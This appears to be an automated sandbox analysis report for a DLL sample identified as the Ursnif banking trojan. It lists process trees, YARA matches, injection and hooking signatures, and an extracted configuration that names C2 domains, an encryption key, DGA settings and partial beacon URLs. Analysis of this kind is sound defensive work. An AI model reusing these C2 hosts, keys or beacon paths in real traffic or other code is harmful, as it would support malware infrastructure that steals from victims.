Play interactive tour

Edit tour

Analysis Report laka4.dll

Overview

General Information

Sample Name:	laka4.dll
Analysis ID:	399641
MD5:	4f2aee8563f78102b67ea3f6d9b9166b
SHA1:	518888baf0266a9638d20fd04cb5727f864d3b39
SHA256:	fd35940bf6701f7d98b39196b19273c86c74757ca2c226cff607fa23df183e03
Infos:
Most interesting Screenshot:

Detection

Ursnif

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Yara detected Ursnif

Hooks registry keys query functions (used to hide registry keys)

Maps a DLL or memory area into another process

Modifies the context of a thread in another process (thread injection)

Modifies the export address table of user mode modules (user mode EAT hooks)

Modifies the import address table of user mode modules (user mode IAT hooks)

Modifies the prolog of user mode functions (user mode inline hooks)

Performs DNS queries to domains with low reputation

Writes or reads registry keys via WMI

Writes registry values via WMI

Contains functionality to call native functions

Contains functionality to query CPU information (cpuid)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Found evasive API chain checking for process token information

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

PE file contains an invalid checksum

Potential browser exploit detected (process start blacklist hit)

Registers a DLL

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Tries to load missing DLLs

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Startup

System is w10x64

loaddll32.exe (PID: 6880 cmdline: loaddll32.exe 'C:\Users\user\Desktop\laka4.dll' MD5: 542795ADF7CC08EFCF675D65310596E8)

cmd.exe (PID: 6912 cmdline: cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\laka4.dll',#1 MD5: F3BDBE3BB6F734E357235F4D5898582D)

rundll32.exe (PID: 6932 cmdline: rundll32.exe 'C:\Users\user\Desktop\laka4.dll',#1 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

cmd.exe (PID: 6992 cmdline: C:\Windows\system32\cmd.exe /c echo 'Guess s' MD5: F3BDBE3BB6F734E357235F4D5898582D)

conhost.exe (PID: 7104 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

cmd.exe (PID: 6112 cmdline: C:\Windows\system32\cmd.exe /c echo 'Guess s' MD5: F3BDBE3BB6F734E357235F4D5898582D)

conhost.exe (PID: 3080 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

cmd.exe (PID: 4684 cmdline: C:\Windows\system32\cmd.exe /c echo 'Guess s' MD5: F3BDBE3BB6F734E357235F4D5898582D)

conhost.exe (PID: 6316 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

regsvr32.exe (PID: 6920 cmdline: regsvr32.exe /s C:\Users\user\Desktop\laka4.dll MD5: 426E7499F6A7346F0410DEAD0805586B)

cmd.exe (PID: 6964 cmdline: C:\Windows\system32\cmd.exe /c echo 'Guess s' MD5: F3BDBE3BB6F734E357235F4D5898582D)

conhost.exe (PID: 7084 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

cmd.exe (PID: 7164 cmdline: C:\Windows\system32\cmd.exe /c echo 'Guess s' MD5: F3BDBE3BB6F734E357235F4D5898582D)

conhost.exe (PID: 5724 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

cmd.exe (PID: 660 cmdline: C:\Windows\system32\cmd.exe /c echo 'Guess s' MD5: F3BDBE3BB6F734E357235F4D5898582D)

conhost.exe (PID: 6664 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

iexplore.exe (PID: 6952 cmdline: C:\Program Files\Internet Explorer\iexplore.exe MD5: 6465CB92B25A7BC1DF8E01D8AC5E7596)

iexplore.exe (PID: 7096 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6952 CREDAT:17410 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)

rundll32.exe (PID: 7036 cmdline: rundll32.exe C:\Users\user\Desktop\laka4.dll,Brightnight MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

cmd.exe (PID: 7128 cmdline: C:\Windows\system32\cmd.exe /c echo 'Guess s' MD5: F3BDBE3BB6F734E357235F4D5898582D)

conhost.exe (PID: 6136 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

cmd.exe (PID: 6568 cmdline: C:\Windows\system32\cmd.exe /c echo 'Guess s' MD5: F3BDBE3BB6F734E357235F4D5898582D)

conhost.exe (PID: 5996 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

cmd.exe (PID: 6412 cmdline: C:\Windows\system32\cmd.exe /c echo 'Guess s' MD5: F3BDBE3BB6F734E357235F4D5898582D)

conhost.exe (PID: 6428 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

rundll32.exe (PID: 6676 cmdline: rundll32.exe C:\Users\user\Desktop\laka4.dll,DllRegisterServer MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

cmd.exe (PID: 6516 cmdline: C:\Windows\system32\cmd.exe /c echo 'Guess s' MD5: F3BDBE3BB6F734E357235F4D5898582D)

conhost.exe (PID: 6416 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

cmd.exe (PID: 4780 cmdline: C:\Windows\system32\cmd.exe /c echo 'Guess s' MD5: F3BDBE3BB6F734E357235F4D5898582D)

conhost.exe (PID: 6792 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

cmd.exe (PID: 5756 cmdline: C:\Windows\system32\cmd.exe /c echo 'Guess s' MD5: F3BDBE3BB6F734E357235F4D5898582D)

conhost.exe (PID: 6712 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

cmd.exe (PID: 1368 cmdline: C:\Windows\system32\cmd.exe /c echo 'Guess s' MD5: F3BDBE3BB6F734E357235F4D5898582D)

cmd.exe (PID: 6784 cmdline: C:\Windows\system32\cmd.exe /c echo 'Guess s' MD5: F3BDBE3BB6F734E357235F4D5898582D)

cmd.exe (PID: 6904 cmdline: C:\Windows\system32\cmd.exe /c echo 'Guess s' MD5: F3BDBE3BB6F734E357235F4D5898582D)

cleanup

Malware Configuration

Threatname: Ursnif

[[{"RSA Public Key": "L/wCy1GoxvEX4NLWc+yzxnqqtxjDB+8uPxRZvPrlDrMxQ2bbJq01o9WFOiHLCJrh+RKu9huQeKHCb5yXElgk2Nd3rgkxeee1N9o1azRKGb/pjfM9Tj2n60aZVNcvtvZDmiTCZ7Le99YkfP0IzOFfvN2B4OghgFjwQeKs81oBHGk2pngD1Zlrq72yIa/kUYrf"}, {"c2_domain": ["1.microsoft.com", "silugerude.xyz", "vilugerude.xyz"], "botnet": "4463", "server": "12", "serpent_key": "10291029JSJUYNHG", "sleep_time": "10", "SetWaitableTimer_value": "0", "dga_base_url": "constitution.org/usdeclar.txt", "dga_tld": "com ru org", "DGA_count": "10"}]]

Yara Overview

Memory Dumps

Source	Rule	Description	Author	Strings
00000018.00000003.775701050.0000000003110000.00000040.00000001.sdmp	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
00000000.00000003.838142140.00000000033B8000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000018.00000003.857625114.00000000056A8000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000002.00000003.909665638.0000000005738000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000018.00000003.959293774.00000000054AC000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000003.00000003.905711954.0000000005618000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000003.00000003.905674059.0000000005618000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000018.00000003.857795473.00000000056A8000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000000.00000003.938999366.00000000031BC000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000018.00000003.857776316.00000000056A8000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000003.00000003.905782753.0000000005618000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000003.00000003.905833677.0000000005618000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000002.00000003.909829429.0000000005738000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000000.00000003.780693607.0000000000BD0000.00000040.00000001.sdmp	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
00000018.00000003.857683077.00000000056A8000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000002.00000003.909904535.0000000005738000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000018.00000003.857820386.00000000056A8000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000018.00000003.857808720.00000000056A8000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000000.00000003.838200660.00000000033B8000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000002.00000003.909762591.0000000005738000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000008.00000003.766624106.0000000002E10000.00000040.00000001.sdmp	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
00000018.00000003.857714581.00000000056A8000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000003.00000003.1009913837.000000000541C000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000000.00000003.838181374.00000000033B8000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000002.00000003.909865416.0000000005738000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000002.00000003.909891092.0000000005738000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000002.00000003.909848147.0000000005738000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000000.00000003.838052469.00000000033B8000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000000.00000003.838002362.00000000033B8000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000003.00000003.905819560.0000000005618000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000002.00000003.909807581.0000000005738000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000002.00000003.1013072792.000000000553C000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000000.00000003.838240951.00000000033B8000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000018.00000003.857756795.00000000056A8000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000000.00000003.838099477.00000000033B8000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000003.00000003.905803436.0000000005618000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000002.00000002.1030930479.00000000010B1000.00000004.00000001.sdmp	SUSP_LNK_SuspiciousCommands	Detects LNK file with suspicious content	Florian Roth	0x16bee:$s12: WScript.Shell 0x17a8d:$s12: wscript.shell
00000003.00000003.764888743.0000000002F40000.00000040.00000001.sdmp	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
00000003.00000003.905753199.0000000005618000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000002.00000003.763148290.0000000000F40000.00000040.00000001.sdmp	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
00000000.00000003.837840447.00000000033B8000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000003.00000003.905845684.0000000005618000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
Click to see the 37 entries

Unpacked PEs

Source	Rule	Description	Author
0.3.loaddll32.exe.bda481.0.raw.unpack	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
3.3.rundll32.exe.2f4a481.0.raw.unpack	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
24.3.rundll32.exe.311a481.0.raw.unpack	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
2.3.regsvr32.exe.f4a481.0.raw.unpack	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
8.3.rundll32.exe.2e1a481.0.raw.unpack	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security

Sigma Overview

No Sigma rule has matched

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Found malware configuration

Show sources

Source: 24.3.rundll32.exe.311a481.0.raw.unpack

Malware Configuration Extractor: Ursnif [[{"RSA Public Key": "L/wCy1GoxvEX4NLWc+yzxnqqtxjDB+8uPxRZvPrlDrMxQ2bbJq01o9WFOiHLCJrh+RKu9huQeKHCb5yXElgk2Nd3rgkxeee1N9o1azRKGb/pjfM9Tj2n60aZVNcvtvZDmiTCZ7Le99YkfP0IzOFfvN2B4OghgFjwQeKs81oBHGk2pngD1Zlrq72yIa/kUYrf"}, {"c2_domain": ["1.microsoft.com", "silugerude.xyz", "vilugerude.xyz"], "botnet": "4463", "server": "12", "serpent_key": "10291029JSJUYNHG", "sleep_time": "10", "SetWaitableTimer_value": "0", "dga_base_url": "constitution.org/usdeclar.txt", "dga_tld": "com ru org", "DGA_count": "10"}]]

Source: laka4.dll

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL

Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe

File opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dll

Source: unknown	HTTPS traffic detected: 104.20.185.68:443 -> 192.168.2.4:49751 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.20.185.68:443 -> 192.168.2.4:49750 version: TLS 1.2

Source:

Binary string: c:\Floor help\sharp\Baby\Meas\smile.pdb source: laka4.dll

Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_007D7DA3 RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,memset,CreateFileA,GetFileTime,FindCloseChangeNotification,StrRChrA,lstrcat,FindFirstFileA,FindFirstFileA,CompareFileTime,CompareFileTime,FindClose,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,StrChrA,memcpy,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,FindClose,HeapFree,HeapFree,		0_2_007D7DA3
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_00F47DA3 RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,memset,CreateFileA,GetFileTime,FindCloseChangeNotification,StrRChrA,lstrcat,FindFirstFileA,FindFirstFileA,CompareFileTime,CompareFileTime,FindClose,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,StrChrA,memcpy,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,FindClose,HeapFree,HeapFree,		2_2_00F47DA3

Source: C:\Program Files\internet explorer\iexplore.exe

Process created: C:\Windows\System32\conhost.exe

Jump to behavior

Networking:

Performs DNS queries to domains with low reputation

Show sources

Source:	DNS query: silugerude.xyz
Source:	DNS query: silugerude.xyz
Source:	DNS query: vilugerude.xyz
Source:	DNS query: vilugerude.xyz
Source:	DNS query: vilugerude.xyz
Source:	DNS query: vilugerude.xyz
Source:	DNS query: silugerude.xyz
Source:	DNS query: silugerude.xyz
Source:	DNS query: vilugerude.xyz
Source:	DNS query: vilugerude.xyz
Source:	DNS query: vilugerude.xyz
Source:	DNS query: vilugerude.xyz
Source:	DNS query: vilugerude.xyz
Source:	DNS query: vilugerude.xyz
Source:	DNS query: vilugerude.xyz
Source:	DNS query: vilugerude.xyz

Source: Joe Sandbox View

IP Address: 104.20.185.68 104.20.185.68

Source: Joe Sandbox View

JA3 fingerprint: 9e10692f1b7f78228b2d4e424db3a98c

Source: de-ch[1].htm.10.dr	String found in binary or memory: <a href="https://www.facebook.com/" target="_blank" data-piitxt="facebooklite" piiurl="https://www.facebook.com/"> equals www.facebook.com (Facebook)
Source: msapplication.xml0.5.dr	String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0x156dd860,0x01d73c7e</date><accdate>0x156dd860,0x01d73c7e</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.facebook.com (Facebook)
Source: msapplication.xml0.5.dr	String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0x156dd860,0x01d73c7e</date><accdate>0x156dd860,0x01d73c7e</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Facebook.url"/></tile></msapplication></browserconfig> equals www.facebook.com (Facebook)
Source: msapplication.xml5.5.dr	String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0x15729d0d,0x01d73c7e</date><accdate>0x15729d0d,0x01d73c7e</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.twitter.com (Twitter)
Source: msapplication.xml5.5.dr	String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0x15729d0d,0x01d73c7e</date><accdate>0x15729d0d,0x01d73c7e</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Twitter.url"/></tile></msapplication></browserconfig> equals www.twitter.com (Twitter)
Source: msapplication.xml7.5.dr	String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0x1574ff56,0x01d73c7e</date><accdate>0x1574ff56,0x01d73c7e</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.youtube.com (Youtube)
Source: msapplication.xml7.5.dr	String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0x1574ff56,0x01d73c7e</date><accdate>0x1574ff56,0x01d73c7e</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Youtube.url"/></tile></msapplication></browserconfig> equals www.youtube.com (Youtube)
Source: de-ch[1].htm.10.dr	String found in binary or memory: <link rel="preconnect" href="img-s-msn-com.akamaized.net" /><link rel="preconnect" href="c.msn.com" /><link rel="preconnect" href="c.msn.cn" /><link rel="preconnect" href="https://www.bing.com" /><link rel="preconnect" href="//web.vortex.data.msn.com" /><link rel="dns-prefetch" href="img-s-msn-com.akamaized.net" /><link rel="dns-prefetch" href="c.msn.com" /><link rel="dns-prefetch" href="c.msn.cn" /><link rel="dns-prefetch" href="https://www.bing.com" /><link rel="dns-prefetch" href="//web.vortex.data.msn.com" /><link rel="canonical" href="https://www.msn.com/de-ch/" /><meta name="msapplication-TileColor" content="#224f7b"/><meta name="msapplication-TileImage" content="//static-global-s-msn-com.akamaized.net/hp-neu/sc/1f/08ced4.png"/><meta name="msapplication-config" content="none"/> <title>MSN Schweiz \| Sign in Hotmail, Outlook Login, Windows Live, Office 365</title> equals www.hotmail.com (Hotmail)
Source: 52-478955-68ddb2ab[1].js.10.dr	String found in binary or memory: glich.",errorFooterText:"Zu Twitter wechseln",taskLinks:"Benachrichtigungen\|https://twitter.com/i/notifications;Ich\|#;Abmelden\|#"}],xbox:[{header:"Spotlight",content:"",footerText:"Alle anzeigen",footerUrl:"",taskLinks:"me_groove_taskLinks_store\|https://www.microsoft.com/store/media/redirect/music?view=hub;me_groove_taskLinks_play\|https://aka.ms/Ixhi8e;me_groove_taskLinks_try\|https://aka.ms/msvmj1"},{header:"Meine tolle Wiedergabeliste",headerUrl:"https://aka.ms/qeqf5y",content:"",errorMessage:"",taskLinks:"me_groove_taskLinks_store\|https://www.microsoft.com/store/media/redirect/music?view=hub;me_groove_taskLinks_play\|https://aka.ms/Ixhi8e;me_groove_taskLinks_try\|https://aka.ms/msvmj1"}],bingrewards:[{header:"Pr equals www.twitter.com (Twitter)
Source: de-ch[1].htm.10.dr	String found in binary or memory: hren, die sich auf Ihren Internetdatenverkehr auswirken.<br/><br/><a href=\""+e.html(f)+'" onclick="window.location.reload(true)">Klicken Sie hier<\/a> um diese Seite erneut zu laden, oder besuchen Sie: <a href="'+i+'">'+i+"<\/a><\/p><\/div><div id='errorref'><span>Ref 1: "+e.html(o(t.clientSettings.aid))+"   Ref 2: "+e.html(t.clientSettings.sid\|\|"000000")+"   Ref 3: "+e.html((new r.Date).toUTCString())+"<\/span><\/div><\/div>"});ot({errId:1512,errMsg:n})}function ot(n){require(["track"],function(t){var i={errId:n.errId,errMsg:n.errMsg,reportingType:0};t.trackAppErrorEvent(i)})}function tt(){var n=v(arguments);a(l(n,b),n,!0)}function st(){var n=v(arguments);a(l(n,h),n)}function ht(){var n=v(arguments);a(l(n,y),n)}function ct(n){(r.console\|\|{}).timeStamp?console.timeStamp(n):(r.performance\|\|{}).mark&&r.performance.mark(n)}var w=0,it=-1,b=0,h=1,y=2,s=[],p,k,rt,o,d=!1,c=Math.random()*100<=-1;return ut(r,function(n,t,i,r){return w++,n=nt(n,t,i,r," [ENDMESSAGE]"),n&&tt("[SCRIPTERROR] "+n),!0}),c&&require(["jquery","c.deferred"],function(n){k=!0;rt=n;s.length&&g()}),{error:tt,fatalError:et,unhandledErrorCount:function(){return w},perfMark:ct,warning:st,information:ht}});require(["viewAwareInit"],function(n){n({size2row:"(min-height: 48.75em)",size1row:"(max-height: 48.74em)",size4column:"(min-width: 72em)",size3column:"(min-width: 52.313em) and (max-width: 71.99em)",size2column:"(min-width: 43.75em) and (max-width: 52.303em)",size2rowsize4column:"(min-width: 72em) and (min-height: 48.75em)",size2rowsize3column:"(min-width: 52.313em) and (max-width: 71.99em) and (min-height: 48.75em)",size2rowsize2column:"(max-width: 52.303em) and (min-height: 48.75em)",size1rowsize4column:"(min-width: 72em) and (max-height: 48.74em)",size1rowsize3column:"(min-width: 52.313em) and (max-width: 71.99em) and (max-height: 48.74em)",size1rowsize2column:"(max-width: 52.303em) and (max-height: 48.74em)"})});require(["deviceInit"],function(n){n({AllowTransform3d:"false",AllowTransform2d:"true",RtlScrollLeftAdjustment:"none",ShowMoveTouchGestures:"true",SupportFixedPosition:"true",UseCustomMatchMedia:null,Viewport_Behavior:"Default",Viewport_Landscape:null,Viewport:"width=device-width,initial-scale=1.0",IsMobileDevice:"false"})})</script><meta property="sharing_url" content="https://www.msn.com/de-ch"/><meta property="og:url" content="https://www.msn.com/de-ch/"/><meta property="og:title" content="MSN Schweiz \| Sign in Hotmail, Outlook Login, Windows Live, Office 365"/><meta property="twitter:card" content="summary_large_image"/><meta property="og:type" content="website"/><meta property="og:site_name" content="MSN"/><meta property="og:image" content="https://static-global-s-msn-com.akamaized.net/hp-neu/sc/c6/519670.jpg"/><link rel="shortcut icon" href="//static-global-s-msn-com.akamaized.net/hp-neu/sc/2b/a5ea21.ico" /><style>@media screen and (max-width:78.99em) and (min-width:58.875em){.layout-none:not(.mod1) .pos2{left:0}}.ie8 .grid .pick4~li.pick
Source: 52-478955-68ddb2ab[1].js.10.dr	String found in binary or memory: pfen Sie Ihr Skype-Konto und Ihr Microsoft-Konto.",continueButtonText:"Weiter",learnMoreText:"Hilfe",learnMoreUrl:"https://support.skype.com",callMessageText:"Anruf",fileMessageText:"Datei gesendet",videoMessageText:"Videonachricht",contactMessageText:"Kontakt gesendet"}],jsskype:[{},{}],facebookLite:[{},{likeUrl:"https://www.facebook.com/msnch"}],twitter:[{header:"Twitter",content:"Rufen Sie Ihre Twitter-Updates ab",footerText:"Anmelden",footerUrl:"https://twitter.com",requestTimeout:"10000",taskLinks:""},{header:"Tweets",headerUrl:"https://twitter.com",content:"Laden ...",noContent:"Ihre Timeline ist derzeit leer",errorMessage:"Anmelden bei Twitter nicht m equals www.facebook.com (Facebook)
Source: 52-478955-68ddb2ab[1].js.10.dr	String found in binary or memory: pfen Sie Ihr Skype-Konto und Ihr Microsoft-Konto.",continueButtonText:"Weiter",learnMoreText:"Hilfe",learnMoreUrl:"https://support.skype.com",callMessageText:"Anruf",fileMessageText:"Datei gesendet",videoMessageText:"Videonachricht",contactMessageText:"Kontakt gesendet"}],jsskype:[{},{}],facebookLite:[{},{likeUrl:"https://www.facebook.com/msnch"}],twitter:[{header:"Twitter",content:"Rufen Sie Ihre Twitter-Updates ab",footerText:"Anmelden",footerUrl:"https://twitter.com",requestTimeout:"10000",taskLinks:""},{header:"Tweets",headerUrl:"https://twitter.com",content:"Laden ...",noContent:"Ihre Timeline ist derzeit leer",errorMessage:"Anmelden bei Twitter nicht m equals www.twitter.com (Twitter)
Source: 52-478955-68ddb2ab[1].js.10.dr	String found in binary or memory: ter erneut.",viewInboxErrorMessage:"Wenn beim Anzeigen Ihres Posteingangs weiterhin ein Problem auftritt, besuchen Sie",taskLinks:"Verfassen\|https://outlook.live.com/mail/deeplink/compose;Kalender\|https://outlook.live.com/calendar",piiText:"Read Outlook Email",piiUrl:"http://www.hotmail.msn.com/pii/ReadOutlookEmail/"}],office:[{header:"Office",content:"Zeigen Sie Ihre zuletzt verwendeten Dokumente an oder erstellen Sie kostenlos mit Office Online ein neues.",footerText:"Anmelden",footerUrl:"[[signin]]",ssoAutoRefresh:!0,taskLinks:"Word Online\|https://office.live.com/start/Word.aspx?WT.mc_id=MSN_site;Excel Online\|https://office.live.com/start/Excel.aspx?WT.mc_id=MSN_site;Sway\|https://www.sway.com/?WT.mc_id=MSN_site&utm_source=MSN&utm_medium=Topnav&utm_campaign=link;PowerPoint Online\|https://office.live.com/start/PowerPoint.aspx?WT.mc_id=MSN_site"},{header:"Aktuelle Dokumente",headerUrl:"https://onedrive.live.com/#qt=mru",content:"Wird geladen ...",noContent:"Dieser Ordner ist leer. Klicken Sie unten, um ein neues Dokument zu erstellen.",errorMessage:"Keine Verbindung mit Office Online m equals www.hotmail.com (Hotmail)

Source: unknown

DNS traffic detected: queries for: www.msn.com

Source: de-ch[1].htm.10.dr	String found in binary or memory: http://ogp.me/ns#
Source: de-ch[1].htm.10.dr	String found in binary or memory: http://ogp.me/ns/fb#
Source: {3BB1EF45-A871-11EB-90EB-ECF4BBEA1588}.dat.5.dr	String found in binary or memory: http://searchads.msn.net/.cfm?&&kp=1&
Source: ~DF350590C2B9D41CB2.TMP.5.dr, {8BC3AC88-A871-11EB-90EB-ECF4BBEA1588}.dat.5.dr	String found in binary or memory: http://silugerude.xyz/palok/BCk7mFxSRy/Qm0SzTs5dMXdNL8SU/P_2BkhEGcRW5/U9Vx3mh5hRK/dX0HNPUxJl8j6m/IQf
Source: {92BC32FA-A871-11EB-90EB-ECF4BBEA1588}.dat.5.dr	String found in binary or memory: http://silugerude.xyz/palok/JYNgnm_2BBHAequLwRjE0/wog2aPyjIrhfiChj/_2F7KNmTOp7gcHK/jNoiBVFK7FGrcvPg_
Source: ~DF29CFFC13F95711AB.TMP.5.dr, {7ECFB246-A871-11EB-90EB-ECF4BBEA1588}.dat.5.dr	String found in binary or memory: http://silugerude.xyz/palok/TFAutzbu/gCe3ncCBLMH7DreC61qLPHX/ngaLnwVCvh/xXteQjB63wWsF2t6A/Zz_2BRALS7
Source: ~DF6E75D50C571952C5.TMP.5.dr, {7ECFB244-A871-11EB-90EB-ECF4BBEA1588}.dat.5.dr	String found in binary or memory: http://silugerude.xyz/palok/Ypgl4JI_2FR/m0yEq7_2B7ljWe/BPm0RVhpDIfFWYr2d3BFy/aXhI5T_2B9mwNkry/hFC_2F
Source: imagestore.dat.5.dr	String found in binary or memory: http://vilugerude.xyz/favicon.ico
Source: imagestore.dat.5.dr	String found in binary or memory: http://vilugerude.xyz/favicon.ico~
Source: {9F800807-A871-11EB-90EB-ECF4BBEA1588}.dat.5.dr	String found in binary or memory: http://vilugerude.xyz/palok/02XIlHxdbtKM8P3i3ca/47BqsC6_2FhAXQycTT8tDA/RUNfA0sZ_2BZr/1jh8HIyV/8yUbmY
Source: ~DFFCDBC08326237A5C.TMP.5.dr, {92BC32FC-A871-11EB-90EB-ECF4BBEA1588}.dat.5.dr	String found in binary or memory: http://vilugerude.xyz/palok/ByknSZ2tON9683wB1nz_2/FXwcC_2Ftu5SOLf_/2B2lhXejD0yHkC3/naPotBkzM8oI0dYk3
